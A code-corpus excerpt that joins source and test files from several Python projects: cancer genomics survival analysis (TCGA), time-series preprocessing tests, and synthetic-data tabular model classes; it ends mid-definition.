ctype_file = c + '_mutation-fraction-0.02.zscores.out.csv'
df = pd.read_csv(os.path.join(platform_dir, ctype_file), index_col=0)
if('p' in df.columns):
pvals[p] = df.p
pval_df = pd.DataFrame(df.p).melt().dropna()
rejected, corrected_p = fdrcorrection(pval_df['value'].values)
pval_df['corrected-p'] = corrected_p
significant_corrected_pvals[c] = pval_df.groupby('variable').apply(count_sig)
print(pd.DataFrame(significant_corrected_pvals))
outdf = pd.DataFrame(significant_corrected_pvals).T
outdf.to_csv(os.path.join(outdir, 'significant_corrected_pvals.csv'))
#%% FDR correction -- within cancer type+platform fdr
outdir = dropbox_dir + 'comprehensive-tcga-survival/univariate-fdr'
indir = dropbox_dir + 'comprehensive-tcga-survival'
corrected_p_df = {}
for c in cancer_types:
platforms_corrected_counts = {}
for p in platforms.keys():
platform_dir = os.path.join(indir, p)
ctype_file = c + '.zscores.out.csv'
if 'mutations' in p:
ctype_file = c + '_0.02.zscores.out.csv'
df = pd.read_csv(os.path.join(platform_dir, ctype_file), index_col=0)
if('p' in df.columns):
rejected, corrected_p = fdrcorrection(df['p'].dropna(), alpha=0.05)
platforms_corrected_counts[p] = rejected.sum()
corrected_p_df[c] = platforms_corrected_counts
outdf = pd.DataFrame(corrected_p_df).T
outdf.to_csv(os.path.join(outdir, 'significant_corrected_pvals_ctype_0.05.csv'))
#%% stouffer fdr
outdir = dropbox_dir + 'comprehensive-tcga-survival/univariate-fdr'
for p in platforms.keys():
pancan = pd.read_csv(glob.glob(os.path.join(indir, p, '*pancan.csv'))[0], index_col=0)
pancan = pancan.dropna(subset=['stouffer unweighted'])
pancan['stouffer-p'] = scipy.stats.norm.sf(abs(pancan['stouffer unweighted'].values))*2
print(pancan[['stouffer unweighted', 'stouffer-p']])
rejected05, corrected_p = fdrcorrection(pancan['stouffer-p'], alpha = 0.05)
rejected01, corrected_p = fdrcorrection(pancan['stouffer-p'], alpha = 0.01)
pancan.loc[:, 'rejected-0.05'] = rejected05
pancan.loc[:, 'rejected-0.01'] = rejected01
pancan.loc[:, 'corrected-p'] = corrected_p
pancan.to_csv(os.path.join(outdir, p + '_univariate_fdr.csv'))
#%% P53-mutant multivariate zscores
parallel = 35
outdir = dropbox_dir + 'comprehensive-tcga-survival/p53-mutant-multivariate-zscores'
mutations_df = mutations.prep_data(platforms['mutations-non-synonymous'])
p53_muts = {}
for ctype in tcga_cdr_local.cancer_types():
ctype_clinical = tcga_cdr_local.cancer_type_data(ctype)
ctype_muts = mutations.ctype_cleaning(mutations_df, ctype, ctype_clinical)
if '\'TP53' in list(ctype_muts.columns.values):
p53_muts[ctype] = ctype_muts[['\'TP53']]
else:
p53_muts[ctype] = pd.DataFrame({'\'TP53': [0]*ctype_muts.shape[0]}, index=ctype_muts.index)
p53_muts[ctype].columns = [i[1:] if '\'' in i else i for i in p53_muts[ctype].columns]
print(p53_muts[ctype].columns)
print('mutant selection complete')
for k in p53_muts.keys():
p53_muts[k].columns = p53_muts[k].columns = [i + '_mut' for i in p53_muts[k].columns]
print(p53_muts['ACC'].columns)
for p, rd in platforms.items():
platform_outdir = os.path.join(outdir, p)
pathlib.Path(platform_outdir).mkdir(parents=True, exist_ok=True)
if p == 'rppa':
rppa.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'cn':
cn.zscores(rd, clinical, platform_outdir, 14, additional_vars=p53_muts)
if p == 'rnaseq':
rnaseq.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'mirna':
mirna.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
methylation.zscores(methylation_data, methylation_key, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'mutations-non-synonymous':
mutations.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
```
#### File: comprehensive-tcga-survival/comprehensive_tcga_survival/rppa.py
```python
import pandas as pd
import argparse
import sys
import os
import biomarker_survival as surv
from .zscore_common import ZscoreCommon
def get_options(argv):
parser = argparse.ArgumentParser(description='Get rppa file, clinical file, optional output dir')
parser.add_argument('-r', action='store', dest='rppa')
parser.add_argument('-c', action='store', dest='tcga_cdr')
parser.add_argument('-p', action='store', dest='parallel', type=int)
parser.add_argument('-o', action='store', dest='output_directory', default='.')
ns = parser.parse_args()
return ns.rppa, ns.tcga_cdr, ns.output_directory, ns.parallel
def ctype_cleaning(df, ctype, ctype_clinical): #ctype_clinical is unused
ctype_filter = ctype
if ctype in ['COAD', 'READ']:
ctype_filter = 'CORE'
df = df[df['TumorType'] == ctype_filter]
df = surv.maybe_clear_non_01s(df, 'SampleID', ctype)
df = surv.add_identifier_column(df, 'SampleID')
df = df.set_index('identifier')
df = df.drop(['SampleID', 'TumorType'], axis=1)
return df
def prep_data(rppa, extra_data=None):
rppa_data = pd.read_csv(rppa, sep='\t', header=0, na_values='???')
return rppa_data
def zscores(rppa, clinical, outdir, parallel, additional_vars={}):
rppa_zscores = ZscoreCommon(prep_data, ctype_cleaning)
rppa_zscores.zscores(rppa, clinical, outdir, parallel_workers=parallel, additional_vars=additional_vars)
pancan_df = surv.pancan(outdir, multivariate=(len(additional_vars) > 0))
pancan_df.to_csv(os.path.join(outdir, 'pancan.csv'), index_label='gene')
def metadata(rppa, clinical):
rppa_zscores = ZscoreCommon(prep_data, ctype_cleaning)
return rppa_zscores.metadata(rppa, clinical)
def main(argv=None):
rppa, clinical, outdir, parallel = get_options(argv)
zscores(rppa, clinical, outdir, parallel)
if __name__ == "__main__":
main()
```
#### File: comprehensive-tcga-survival/tests/test_cn.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import cn
from comprehensive_tcga_survival import ZscoreCommon
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_prep_annotation_file_structure():
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
annotation = cn.prep_annotation_file(hgnc_annotation)
assert annotation.index.name == 'gene_name'
assert annotation['feature_type'].value_counts().shape == (1,)
def test_prep_annotation_file_one_per_gene():
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
annotation = cn.prep_annotation_file(hgnc_annotation)
# check that there's only one row for each gene
assert annotation.reset_index().groupby('gene_name').count().max()['start'] == 1
assert annotation.shape == (977, 5)
def test_prep_annotation_file_minimum():
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
annotation = cn.prep_annotation_file(hgnc_annotation)
# check that we successfully took the minimum
assert annotation.loc['LINC01409']['start'] == 778747
def test_parse_chrom():
assert cn.parse_chrom('chr1') == 1
assert cn.parse_chrom('chr10') == 10
assert cn.parse_chrom('chrX') == 23
assert cn.parse_chrom('foo') == None
assert cn.parse_chrom('chrM') == 0
def test_prep_and_clean():
cn_path = os.path.join(FIXTURE_DIR, 'cn_small.seg')
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
cn_data = cn.prep_data(cn_path, extra_data=hgnc_annotation)
assert cn_data.shape == (36, 977)
assert 'TCGA-OR-A5J3-10A-01D-A29K-01' in list(cn_data.index)
assert 'ZNF683' in cn_data.columns
assert 'chr' not in cn_data.index
assert 'chr' not in cn_data.columns
def test_prep_and_clean_with_output(tmpdir):
cn_path = os.path.join(FIXTURE_DIR, 'cn_small.seg')
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
cn_data = cn.prep_data(cn_path, extra_data=hgnc_annotation, outdir=tmpdir)
assert cn_data.shape == (38, 977) # includes chromosome and start location
assert 'TCGA-OR-A5J3-10A-01D-A29K-01' in list(cn_data.index)
assert 'ZNF683' in cn_data.columns
assert 'chr' in cn_data.index
assert len(os.listdir(tmpdir)) == 2
assert sorted(os.listdir(tmpdir)) == sorted(['cn_by_gene.csv', 'prepped_annotations.csv'])
def test_zscores(tmpdir):
cn_path = os.path.join(FIXTURE_DIR, 'cn_small.seg')
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
cn_data = cn.prep_data(cn_path, extra_data=hgnc_annotation)
small_cn_data = cn_data.iloc[:,0:20]
cn_zscores = ZscoreCommon(cn.prep_data,
cn.ctype_cleaning,
extra_data=hgnc_annotation)
cox = cn_zscores.cancer_type_cox(small_cn_data, clin.cancer_type_data('ACC'),
'ACC', str(tmpdir))
print(cox)
assert cox.shape == (13, 6)
assert 'AGTRAP' in list(cox.index)
assert cox.loc['AGTRAP'].round(6).to_dict() == {
'hazard_ratio': 1.641397,
'lower_conf': 0.12899,
'n': 18.0,
'p': 0.702574,
'upper_conf': 20.886813,
'z': 0.381848}
```
#### File: comprehensive-tcga-survival/tests/test_multivariate.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import Multivariate
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_prep_multivar():
stage_key_path = os.path.join(FIXTURE_DIR, 'Stage_key.xlsx')
grade_key_path = os.path.join(FIXTURE_DIR, 'Grade_key.xlsx')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
m = Multivariate(clin, stage_key_path, grade_key_path)
cols = m.prep_ctype_multivar('COAD')
print(cols)
print(cols.columns)
assert cols.shape == (457, 5)
assert list(cols.columns).sort() == ['gender', 'race', 'age_at_initial_pathologic_diagnosis', 'GTE_Stage_IV', 'GTE_Stage_III', 'GTE_Stage_II'].sort()
def test_prep_ctype_multivar_esca():
stage_key_path = os.path.join(FIXTURE_DIR, 'Stage_key.xlsx')
grade_key_path = os.path.join(FIXTURE_DIR, 'Grade_key.xlsx')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
m = Multivariate(clin, stage_key_path, grade_key_path)
cols_esca = m.prep_ctype_multivar('ESCA')
assert cols_esca.shape == (185, 4)
assert list(cols_esca.columns).sort() == ['gender', 'race', 'age_at_initial_pathologic_diagnosis', 'GTE_G3', 'GTE_Stage_III'].sort()
def test_prep_all_multivar():
stage_key_path = os.path.join(FIXTURE_DIR, 'Stage_key.xlsx')
grade_key_path = os.path.join(FIXTURE_DIR, 'Grade_key.xlsx')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
m = Multivariate(clin, stage_key_path, grade_key_path)
multivars = m.prep_all_multivar()
assert len(multivars) == 33
assert 'ACC' in multivars.keys()
assert 'BLCA' in multivars.keys()
```
#### File: comprehensive-tcga-survival/tests/test_mutations.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import mutations
from comprehensive_tcga_survival import ZscoreCommon
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_cancer_type_cox(tmpdir):
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
muts_path = os.path.join(FIXTURE_DIR, 'OV_mutations.txt')
muts_data = mutations.prep_data(muts_path)
mutation_zscores = ZscoreCommon(mutations.prep_data, mutations.ctype_cleaning,
use_presence_percentage_of_patients_threshold=True,
threshold_percent=0.02)
cox = mutation_zscores.cancer_type_cox(muts_data, clin.cancer_type_data('OV'), 'OV', str(tmpdir))
assert len(tmpdir.listdir()) == 1
assert tmpdir.listdir()[0].basename == 'OV_0.02.zscores.out.csv'
reference_results = pd.read_csv(os.path.join(FIXTURE_DIR, 'OV_0.02.zscores.out.csv'), index_col=0).astype(float)
cox_results = pd.read_csv(tmpdir.listdir()[0], index_col=0).astype(float)
cox_results = cox_results[reference_results.columns]
pd.testing.assert_frame_equal(cox_results, reference_results, check_less_precise=5)
```
#### File: comprehensive-tcga-survival/tests/test_rppa.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import rppa
from comprehensive_tcga_survival import ZscoreCommon
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_prep_and_clean():
rppa_path = os.path.join(FIXTURE_DIR, 'rppa_small.txt')
rppa_data = rppa.prep_data(rppa_path)
rppa_ACC = rppa.ctype_cleaning(rppa_data, 'ACC', pd.DataFrame())
assert rppa_ACC.shape == (46, 198)
assert rppa_data.shape == (46, 200) # includes columns for "SampleID" and "TumorType"
assert 'TCGA-PA-A5YG' in list(rppa_ACC.index)
def test_zscores(tmpdir):
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
rppa_path = os.path.join(FIXTURE_DIR, 'rppa_small.txt')
rppa_data = rppa.prep_data(rppa_path)
# 0th is the "index" col which is dropped during cleanup
rppa_subset = rppa_data[rppa_data.columns[0:52]]
rppa_zscores = ZscoreCommon(rppa.prep_data, rppa.ctype_cleaning)
cox = rppa_zscores.cancer_type_cox(rppa_subset, clin.cancer_type_data('ACC'), 'ACC', str(tmpdir))
assert cox.shape == (50, 6)
assert 'AKT' in list(cox.index)
assert cox.loc['AKT'].round(6).to_dict() == {
'hazard_ratio': 0.609382,
'lower_conf': 0.212732,
'n': 46.000000,
'p': 0.356296,
'upper_conf': 1.745601,
'z': -0.922446}
def test_multivar_zscore(tmpdir):
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
rppa_path = os.path.join(FIXTURE_DIR, 'rppa_small.txt')
rppa_data = rppa.prep_data(rppa_path)
# 0th is the "index" col which is dropped during cleanup
rppa_subset = rppa_data[rppa_data.columns[0:52]]
extra_cols = clin.cancer_type_data('ACC', extra_cols=['gender'])[['gender']]
extra_cols = extra_cols.replace({'MALE': 0, 'FEMALE': 1})
rppa_zscores = ZscoreCommon(rppa.prep_data, rppa.ctype_cleaning)
cox = rppa_zscores.cancer_type_cox_multivar(rppa_subset, clin.cancer_type_data('ACC'), 'ACC', str(tmpdir), extra_cols)
print(tmpdir)
assert cox.shape == (50, 11)
assert 'AKT' in list(cox.index)
assert cox.loc['AKT'].round(6).to_dict() == {
'gender-p': 0.104235,
'gender-z': 1.624659,
'gender_hazard_ratio': 2.893846,
'gender_lower_conf': 0.803079,
'gender_upper_conf': 10.427789,
'var-n': 46.0,
'var-p': 0.320603,
'var-z': -0.99322,
'var_hazard_ratio': 0.598101,
'var_lower_conf': 0.216907,
'var_upper_conf': 1.649208
}
``` |
{
"source": "joanvaquer/MLPrimitives",
"score": 3
} |
#### File: tests/custom/test_timeseries_preprocessing.py
```python
from unittest import TestCase
import numpy as np
import pandas as pd
from numpy.testing import assert_allclose
from mlprimitives.custom.timeseries_preprocessing import (
intervals_to_mask, rolling_window_sequences, time_segments_aggregate, time_segments_average)
class IntervalsToMaskTest(TestCase):
def _run(self, index, intervals, expected):
mask = intervals_to_mask(index, intervals)
assert_allclose(mask, expected)
def test_no_intervals(self):
index = np.array([1, 2, 3, 4])
intervals = None
expected = np.array([False, False, False, False])
self._run(index, intervals, expected)
def test_empty_list(self):
index = np.array([1, 2, 3, 4])
intervals = list()
expected = np.array([False, False, False, False])
self._run(index, intervals, expected)
def test_empty_array(self):
index = np.array([1, 2, 3, 4])
intervals = np.array([])
expected = np.array([False, False, False, False])
self._run(index, intervals, expected)
def test_one_interval(self):
index = np.array([1, 2, 3, 4])
intervals = np.array([[2, 3]])
expected = np.array([False, True, True, False])
self._run(index, intervals, expected)
def test_two_intervals(self):
index = np.array([1, 2, 3, 4, 5, 6, 7])
intervals = np.array([[2, 3], [5, 6]])
expected = np.array([False, True, True, False, True, True, False])
self._run(index, intervals, expected)
def test_two_intervals_list(self):
index = np.array([1, 2, 3, 4, 5, 6, 7])
intervals = [[2, 3], [5, 6]]
expected = np.array([False, True, True, False, True, True, False])
self._run(index, intervals, expected)
def test_start_index(self):
index = np.array([1, 2, 3, 4])
intervals = [[1, 2]]
expected = np.array([True, True, False, False])
self._run(index, intervals, expected)
def test_end_index(self):
index = np.array([1, 2, 3, 4])
intervals = [[3, 4]]
expected = np.array([False, False, True, True])
self._run(index, intervals, expected)
def test_whole_index(self):
index = np.array([1, 2, 3, 4])
intervals = [[1, 4]]
expected = np.array([True, True, True, True])
self._run(index, intervals, expected)
def test_exceed_index_start(self):
index = np.array([2, 3, 4])
intervals = [[1, 3]]
expected = np.array([True, True, False])
self._run(index, intervals, expected)
def test_exceed_index_end(self):
index = np.array([2, 3, 4])
intervals = [[3, 5]]
expected = np.array([False, True, True])
self._run(index, intervals, expected)
def test_exceed_index(self):
index = np.array([2, 3, 4])
intervals = [[1, 5]]
expected = np.array([True, True, True])
self._run(index, intervals, expected)
class RollingWindowSequencesTest(TestCase):
def _run(self, X, index, expected_X, expected_y, expected_X_index, expected_y_index,
window_size=2, target_size=1, step_size=1, target_column=0, drop=None,
drop_windows=False):
X, y, X_index, y_index = rolling_window_sequences(X, index, window_size, target_size,
step_size, target_column, drop,
drop_windows)
assert_allclose(X.astype(float), expected_X)
assert_allclose(y.astype(float), expected_y)
assert_allclose(X_index, expected_X_index)
assert_allclose(y_index, expected_y_index)
def test_no_drop(self):
X = np.array([[0.5], [1], [0.5], [1]])
index = np.array([1, 2, 3, 4])
expected_X = np.array([[[0.5], [1]], [[1], [0.5]]])
expected_y = np.array([[0.5], [1]])
expected_X_index = np.array([1, 2])
expected_y_index = np.array([3, 4])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index)
def test_drop_mask(self):
X = np.array([[0.5], [1], [0.5], [1], [0.5], [1], [0.5], [1], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9])
drop = np.array([False, False, False, True, True, False, False, False, False])
expected_X = np.array([[[0.5], [1]], [[1], [0.5]], [[0.5], [1]]])
expected_y = np.array([[0.5], [1], [0.5]])
expected_X_index = np.array([1, 6, 7])
expected_y_index = np.array([3, 8, 9])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_float(self):
X = np.array([[0.5], [0.5], [0.5], [1.0], [1.0], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = 1.0
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_None(self):
X = np.array([[0.5], [0.5], [0.5], [None], [None], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = None
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_float_nan(self):
X = np.array([[0.5], [0.5], [0.5], ['nan'], ['nan'], [0.5], [0.5], [0.5]]).astype(float)
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = float('nan')
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_str(self):
X = np.array([[0.5], [0.5], [0.5], ['test'], ['test'], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = "test"
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_bool(self):
X = np.array([[0.5], [0.5], [0.5], [False], [False], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = False
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
class TimeSegmentsAverageTest(TestCase):
def _run(self, X, interval, expected_values, expected_index, time_column):
values, index = time_segments_average(X, interval, time_column)
assert_allclose(values, expected_values)
assert_allclose(index, expected_index)
def test_array(self):
X = np.array([[1, 1], [2, 3], [3, 1], [4, 3]])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column=0)
def test_pandas_dataframe(self):
X = pd.DataFrame([
[1, 1],
[2, 3],
[3, 1],
[4, 3]
], columns=['timestamp', 'value'])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column="timestamp")
class TimeSegmentsAggregateTest(TestCase):
def _run(self, X, interval, expected_values, expected_index, time_column, method=['mean']):
values, index = time_segments_aggregate(X, interval, time_column, method=method)
assert_allclose(values, expected_values)
assert_allclose(index, expected_index)
def test_array(self):
X = np.array([[1, 1], [2, 3], [3, 1], [4, 3]])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column=0)
def test_pandas_dataframe(self):
X = pd.DataFrame([
[1, 1],
[2, 3],
[3, 1],
[4, 3]
], columns=['timestamp', 'value'])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column="timestamp")
def test_multiple(self):
X = np.array([[1, 1], [2, 3], [3, 1], [4, 3]])
interval = 2
expected_values = np.array([[2, 2], [2, 2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column=0,
method=['mean', 'median'])
``` |
{
"source": "joanvaquer/SDV",
"score": 3
} |
#### File: sdv/tabular/base.py
```python
import logging
import pickle
from sdv.metadata import Table
LOGGER = logging.getLogger(__name__)
class NonParametricError(Exception):
"""Exception to indicate that a model is not parametric."""
class BaseTabularModel():
"""Base class for all the tabular models.
The ``BaseTabularModel`` class defines the common API that all the
TabularModels need to implement, as well as common functionality.
Args:
field_names (list[str]):
List of names of the fields that need to be modeled
and included in the generated output data. Any additional
fields found in the data will be ignored and will not be
included in the generated output.
If ``None``, all the fields found in the data are used.
field_types (dict[str, dict]):
Dictinary specifying the data types and subtypes
of the fields that will be modeled. Field types and subtypes
combinations must be compatible with the SDV Metadata Schema.
field_transformers (dict[str, str]):
Dictinary specifying which transformers to use for each field.
Available transformers are:
* ``integer``: Uses a ``NumericalTransformer`` of dtype ``int``.
* ``float``: Uses a ``NumericalTransformer`` of dtype ``float``.
* ``categorical``: Uses a ``CategoricalTransformer`` without gaussian noise.
* ``categorical_fuzzy``: Uses a ``CategoricalTransformer`` adding gaussian noise.
* ``one_hot_encoding``: Uses a ``OneHotEncodingTransformer``.
* ``label_encoding``: Uses a ``LabelEncodingTransformer``.
* ``boolean``: Uses a ``BooleanTransformer``.
* ``datetime``: Uses a ``DatetimeTransformer``.
anonymize_fields (dict[str, str]):
Dict specifying which fields to anonymize and what faker
category they belong to.
primary_key (str):
Name of the field which is the primary key of the table.
constraints (list[Constraint, dict]):
List of Constraint objects or dicts.
table_metadata (dict or metadata.Table):
Table metadata instance or dict representation.
If given alongside any other metadata-related arguments, an
exception will be raised.
If not given at all, it will be built using the other
arguments or learned from the data.
"""
_DTYPE_TRANSFORMERS = None
_metadata = None
def __init__(self, field_names=None, field_types=None, field_transformers=None,
anonymize_fields=None, primary_key=None, constraints=None, table_metadata=None):
if table_metadata is None:
self._metadata = Table(
field_names=field_names,
primary_key=primary_key,
field_types=field_types,
anonymize_fields=anonymize_fields,
constraints=constraints,
dtype_transformers=self._DTYPE_TRANSFORMERS,
)
else:
for arg in (field_names, primary_key, field_types, anonymize_fields, constraints):
if arg:
raise ValueError(
'If table_metadata is given {} must be None'.format(arg.__name__))
if isinstance(table_metadata, dict):
table_metadata = Table.from_dict(table_metadata)
self._metadata = table_metadata
def fit(self, data):
"""Fit this model to the data.
If the table metadata has not been given, learn it from the data.
Args:
data (pandas.DataFrame or str):
Data to fit the model to. It can be passed as a
``pandas.DataFrame`` or as an ``str``.
If an ``str`` is passed, it is assumed to be
the path to a CSV file which can be loaded using
``pandas.read_csv``.
"""
if not self._metadata.fitted:
self._metadata.fit(data)
self._num_rows = len(data)
transformed = self._metadata.transform(data)
self._fit(transformed)
def get_metadata(self):
"""Get metadata about the table.
This will return an ``sdv.metadata.Table`` object containing
the information about the data that this model has learned.
This Table metadata will contain some common information,
such as field names and data types, as well as additional
information that each Sub-class might add, such as the
observed data field distributions and their parameters.
Returns:
sdv.metadata.Table:
Table metadata.
"""
return self._metadata
def sample(self, num_rows=None, max_retries=100):
"""Sample rows from this table.
Args:
num_rows (int):
Number of rows to sample. If not given the model
will generate as many rows as there were in the
data passed to the ``fit`` method.
max_retries (int):
Number of times to retry sampling discarded rows.
Defaults to 100.
Returns:
pandas.DataFrame:
Sampled data.
"""
num_rows = num_rows or self._num_rows
num_to_sample = num_rows
sampled = self._sample(num_to_sample)
sampled = self._metadata.reverse_transform(sampled)
sampled = self._metadata.filter_valid(sampled)
num_valid = len(sampled)
counter = 0
while num_valid < num_rows:
counter += 1
if counter >= max_retries:
raise ValueError('Could not get enough valid rows within %s trials', max_retries)
invalid = num_rows - num_valid
remaining = num_rows - num_valid
proportion = counter * num_rows / num_valid
num_to_sample = int(remaining * proportion)
LOGGER.info('%s invalid rows found. Resampling %s rows', invalid, num_to_sample)
resampled = self._sample(num_to_sample)
resampled = self._metadata.reverse_transform(resampled)
sampled = sampled.append(resampled)
sampled = self._metadata.filter_valid(sampled)
num_valid = len(sampled)
return sampled.head(num_rows)
def get_parameters(self):
"""Get the parameters learned from the data.
The result is a flat dict (single level) which contains
all the necessary parameters to be able to reproduce
this model.
Subclasses which are not parametric, such as DeepLearning
based models, raise a NonParametricError indicating that
this method is not supported for their implementation.
Returns:
parameters (dict):
flat dict (single level) which contains all the
necessary parameters to be able to reproduce
this model.
Raises:
NonParametricError:
If the model is not parametric or cannot be described
using a simple dictionary.
"""
raise NonParametricError()
def set_parameters(self, parameters):
"""Regenerate a previously learned model from its parameters.
Subclasses which are not parametric, such as DeepLearning
based models, raise a NonParametricError indicating that
this method is not supported for their implementation.
Args:
dict:
Model parameters.
Raises:
NonParametricError:
If the model is not parametric or cannot be described
using a simple dictionary.
"""
raise NonParametricError()
def save(self, path):
"""Save this model instance to the given path using pickle.
Args:
path (str):
Path where the SDV instance will be serialized.
"""
with open(path, 'wb') as output:
pickle.dump(self, output)
@classmethod
def load(cls, path):
"""Load a TabularModel instance from a given path.
Args:
path (str):
Path from which to load the instance.
Returns:
TabularModel:
The loaded tabular model.
"""
with open(path, 'rb') as f:
return pickle.load(f)
```
#### File: sdv/tabular/ctgan.py
```python
from sdv.tabular.base import BaseTabularModel
class CTGAN(BaseTabularModel):
"""Model wrapping ``CTGANSynthesizer`` model.
Args:
field_names (list[str]):
List of names of the fields that need to be modeled
and included in the generated output data. Any additional
fields found in the data will be ignored and will not be
included in the generated output.
If ``None``, all the fields found in the data are used.
field_types (dict[str, dict]):
Dictinary specifying the data types and subtypes
of the fields that will be modeled. Field types and subtypes
combinations must be compatible with the SDV Metadata Schema.
field_transformers (dict[str, str]):
Dictinary specifying which transformers to use for each field.
Available transformers are:
* ``integer``: Uses a ``NumericalTransformer`` of dtype ``int``.
* ``float``: Uses a ``NumericalTransformer`` of dtype ``float``.
* ``categorical``: Uses a ``CategoricalTransformer`` without gaussian noise.
* ``categorical_fuzzy``: Uses a ``CategoricalTransformer`` adding gaussian noise.
* ``one_hot_encoding``: Uses a ``OneHotEncodingTransformer``.
* ``label_encoding``: Uses a ``LabelEncodingTransformer``.
* ``boolean``: Uses a ``BooleanTransformer``.
* ``datetime``: Uses a ``DatetimeTransformer``.
anonymize_fields (dict[str, str]):
Dict specifying which fields to anonymize and what faker
category they belong to.
primary_key (str):
Name of the field which is the primary key of the table.
constraints (list[Constraint, dict]):
List of Constraint objects or dicts.
table_metadata (dict or metadata.Table):
Table metadata instance or dict representation.
If given alongside any other metadata-related arguments, an
exception will be raised.
If not given at all, it will be built using the other
arguments or learned from the data.
epochs (int):
Number of training epochs. Defaults to 300.
log_frequency (boolean):
Whether to use log frequency of categorical levels in conditional
sampling. Defaults to ``True``.
embedding_dim (int):
Size of the random sample passed to the Generator. Defaults to 128.
gen_dim (tuple or list of ints):
Size of the output samples for each one of the Residuals. A Resiudal Layer
will be created for each one of the values provided. Defaults to (256, 256).
dis_dim (tuple or list of ints):
Size of the output samples for each one of the Discriminator Layers. A Linear
Layer will be created for each one of the values provided. Defaults to (256, 256).
l2scale (float):
Wheight Decay for the Adam Optimizer. Defaults to 1e-6.
batch_size (int):
Number of data samples to process in each step.
"""
_CTGAN_CLASS = None
_model = None
_DTYPE_TRANSFORMERS = {
'O': 'label_encoding'
}
def __init__(self, field_names=None, field_types=None, field_transformers=None,
anonymize_fields=None, primary_key=None, constraints=None, table_metadata=None,
